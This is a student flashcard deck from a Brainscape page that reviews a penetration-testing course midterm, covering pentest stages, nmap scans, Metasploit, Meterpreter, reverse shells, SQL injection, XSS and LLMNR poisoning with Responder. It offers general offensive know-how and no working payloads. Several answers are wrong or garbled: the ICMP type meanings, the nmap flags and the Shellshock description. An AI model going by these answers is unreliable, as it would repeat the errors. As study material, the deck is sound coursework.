Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

CENT 330 > Writen Mid Term > Flashcards

Writen Mid Term Flashcards

1
Q
  1. Describe the difference roles of the red, blue, orange, purple teams in a cyber exercise
A

Red Team: (External team) Attackers
Blue Team: (Internal Team) Protect company resources
Orange Team: End Users
Purple Team: Provides in dept analysis of red-blue team interaction
Works with TTP(tactics, traits, procdeures)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q
  1. Give two examples of a vulnerability, threat, risk and asset
A

Vulnerabilites: upatched system, open ports
Threat: E-mail phishing, zero-day attack
Risk: the probaility of threat exploiting a vulnerability
Asset: proprietary software, company data

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q
  1. What is the CVE database and the NVD database
A

CVE – list of entries containing ID#,description,public referance
NVD – US GOV, checklists,flaws,ms configs, national vulnerabilites, database

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q
  1. Describe the stages of the author’s pentesting process and apply to a scenario
A

Inteleigence Gathering - looking @ company websites/emails/phone#
Initial foothold - gain access to the network
Local/network enumeration - build a list of devices on the network
Local priviledge escalation – use tool like meterpreter to look for vulnerable + exploitable service paths
Persistence – create reverse listeners/ back up admin account
Internal movement – infecting other devices on the network
Domain Privilege escalation – get the AD hashes
Dumping hashes – john the ripper
Data identification/exfiltration
Reporting

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q
  1. Describe how you would build your pentesting testing box
A 
Isolated PC running a replica network
-	OS to attack
o	Win10
o	Server
-	Tools
o	Kali
o	Wireshark
o	Nesus
o	Burp
o	Reconing
o	Sqlmap
o	Mimikatz
o	Etc
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q
  1. Describe activities you can perform in a passive pentesting scan
A

Activites that don’t touch the target
Profile Organization -> whois
Profile network -> recon-ng

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q
  1. What website can be used to view old webpages
A

Wayback Machine -> archive.org

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q
  1. Describe activities you can perform in an active pentesting scan
A

Social Engineering
Banner Grabs
Namp scans
Nessus scans

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q
  1. Describe common ICMP error codes. (ICMP type 0,3,8)
A

ICMP type 0 = network unreachable
ICMP type 3 = part unreacable
ICMP type 8 = source host isolated

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q
  1. If reference to the above question, what can a hacker use ICMP error codes for?
A

One can map the network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q
  1. What information can you gather from DNS recon?
A

SOA
MX
NS,(name,srv)
Host Record (A, AAAA)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q
  1. What is a banner grab?
A

Scan to an port to gain high level info of ther service offered on the port

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q
  1. Know the different types of scans NMAP can do and how it does the scan (null, syn, xmas, tcp, version)(indicate TCP flags used)
A 
-	Null 
o	Sn
o	TCP packets with sequence of O and no flag set
-	SYN
o	Ss
o	Sends SYN packets to all ports untill a SYS/ACK is revice from an open port
-	XMAS
o	Sx 
o	Fin, VRG
o	Post flags
-	TCP
o	ST
o	Wait for session to complete three way handshake
-	Version
o	Sv
o	Looks for version through open port
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q
  1. Know what is returned, when a scan hits an open or closed port or a firewall
A

Open: SYS/ACK firewall

No firewall closed : RST

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q
  1. What type of scan will always find a live host?
A

ARP scan

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q
  1. Know how to create a python banner grabber
A 
Import sockets
S = socket.socket( )
s.connect((IP address) hostname, port))
print s. (V(1024)
s.close
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q
  1. Know the difference and usage of a credentialed and non-credentialed scan
A

Credentialed – authenticater scan of host allows sources to see problems that (username/password) cant b seen w/o authentication

Non-credential – quick view of vulnerabiliy by looking at services exposed by host

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q
  1. Describe four methods for making the initial foothold into an organization
A 
Email spear phising -> user clicks on a link or DNS redirection ( user visits malicious website) 
web server ( Deafault password)
Breach
Input flaws
Input login
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q
  1. Describe the web environment and common attacks against the servers. (dns, dos, buffer overflow)
A

DNS – inputs malicious pointer records to point users to you malicious website
DOS – overlaoding post with STU packets
Buffer overflow – overload memory buffer to the point it will run embedded scripts

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q
  1. Describe input/form tampering
A

Attacker modifies : hidden fields, pre-selected parameters, attribute parameters

21
Q
  1. Describe attacks against the web client environment
A

SQL Injections – inputting sql statements to achieve access + access to database

22
Q
  1. What can the blurp proxy do?
A

Act as man-in-the-middle

Captures traffic with the ability to manipulate the traffic

23
Q
  1. What does burp proxy have to do with HTTPS websites?
A

pic

24
Q
  1. What does OWASP web application scanner do?
A

Scan website + website file structure to test for vulnerabliutles such as XSS

25
Q
  1. Describe the functionality of metasploit
A

Metasploit is an automated, open source, exploitation framework. It contains tools for scanning, exploit development, exploitation, and post-exploitation

26
Q
  1. Describe the functionality of meterpreter
A

Meterpreter is consistent crass-platform, post-exploitation, UNIX command-line interface. It cann act as an in-memory stager for loading exploit code such as persistant backdoors, remote packet sniffing, key loggings, system information dumps among others.

27
Q
  1. What is a reverse shell
A

A reverse shell is a shell run from the target system that communicates back to the attacker

28
Q
  1. What is beaconing?
A

Beaconing is when an infected computer reaches out to thte attack to signify installation and to wait further instructions.

29
Q
  1. Describe the heartbleed vulnerability
A

Heartbleed was on OpenSSL vulnerability that reavled a large part of a systems RAM when a large amount of info was asked from it.

30
Q
  1. Describe the shellshock vulnerability
A

Shellshock was a Bash vulnerability which forced systems to accept code with authentication and the beacon back to the attacker.

31
Q
  1. Describe the functionality of MSVenom
A

MSVenom is a beacon-creating application avaiable inside metasploit designed to avoid antivirus software.

32
Q
  1. What is a clear indication that is website is susceptible to an SQL attack?
A

The input fields accpet special characters.

33
Q
  1. Describe how an XSS attack takes place
A

An XSS attack oiccurs when malicious scripts are injected into trusted websites.

34
Q
  1. What makes a website vulnerable to a XSS attack?
A

lack of input validation of a web application which allows an attacker to write script code into a users browser

35
Q
  1. Describe an SQi attack
A

SQL attack is used to attack data-driven application with SQL statements which run a backend SQL database.

36
Q
  1. Describe the functionality of Beef
A

Works in tandem with a XSS attack using Burp or another open-source/ commercial software for proxies . It allows the attacker to also gather information once the victim is in their controll by creating a payload which redirects the victim to a beef malicious website.

37
Q
  1. What is the usage of error message for the pentester
A

Could be used as in information for the pretester to try out the SQL statement or to gain additional information on ther target system.

38
Q
  1. What authentication method does a windows computer use when accessing a computer by name or FQDN when it is part of a domain?
A

SMB protocol

39
Q
  1. What authentication method does a windows computer use when accessing a computer by IP address. (what does the computer send first for authentication)
A

NTLM or SMB

40
Q
  1. Describe the NTLM process
A

-User sends conncetion request to server
-Server genrates 16 bit random one time number to be encrypted by user call challenge/none
-User encrypts the challenge/none code with the hash of the users password
-Server validate encrypted challenge
-Sends DC username challenge sent to client response vertified from client
-DC user the username to retrive the users hashed password from the SAM database
-DC compares the encrypted challenge to the respone by the client
If its identical, authentication is successful

41
Q
  1. Describe the entire process you computer goes through in order to send a packet on the network when you enter www.google.com into a browser?
A

DNS tries to resolve the FWDN
- Looks locally through its DNS records/host files
- If its not listed it will querry DNS servers then resolve IP to domain name
o If it doesn’t work, it tires to LLMNR + net-bios broadcast
- 3- way handshake with web server
- http/https webpage is displayed

42
Q
  1. If reference to the question above how can the process be compromised?
A
  • A man-in-the-middle attack or if traffic between the two computers was sniffed
  • By flooding the victim with LCMR or netbios response packets
43
Q
  1. Describe the entire process your computer goes through in order to send a packet on the network when you enter \class-server into your computer
A

Resolve computer name to an IP address from the IP address it gets resolve to Mac address

44
Q
  1. Describe the functionality of the LSASS
A

Stores windows credentail for ease of use current and pas user credentials are stored and used for authentication

45
Q
  1. Describe 3 methods of escalating privileges
A

Misconfigured privileges
Services with unquoted paths
Services which are writeable by everyone
Misconfiured group policies

46
Q
  1. Describe the process of running PSEXEC, and Windows powershell remotely
A

Powershell – enables WinRM and runs as and end point collects a session from the tartget ip address of the server manges systems remotely due to remove powershell being emised
PSEXEC: used to run remote commands on a windows system, but only its oprts 135 and 445 are open, can also be run on power shell

47
Q
  1. What is LLMNR, Netbios and ARP used for
A

LLMNR: protocol based on the DNS packet format that allows both IPv4 AND IPv6 to hosts to perfrom name resolution for hosts on the same local link
NetBIOS: Program that allows application on different computers to communicate with a LAN
ARP: Network laser protocol used to covert an IP address into a phsyical address

48
Q
  1. How can the above be exploited
A

You can use a tool called responder which listens and responds to LLMNR and NBT-ns
Poisoning the LLMNR and NBT-ns tablet

49
Q
  1. What surprised us about Server 2016 in reference to Powershell?
A

It already had remote powershell enable by default allowing remote access to the server without ther server knowing

CENT 330 (1 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions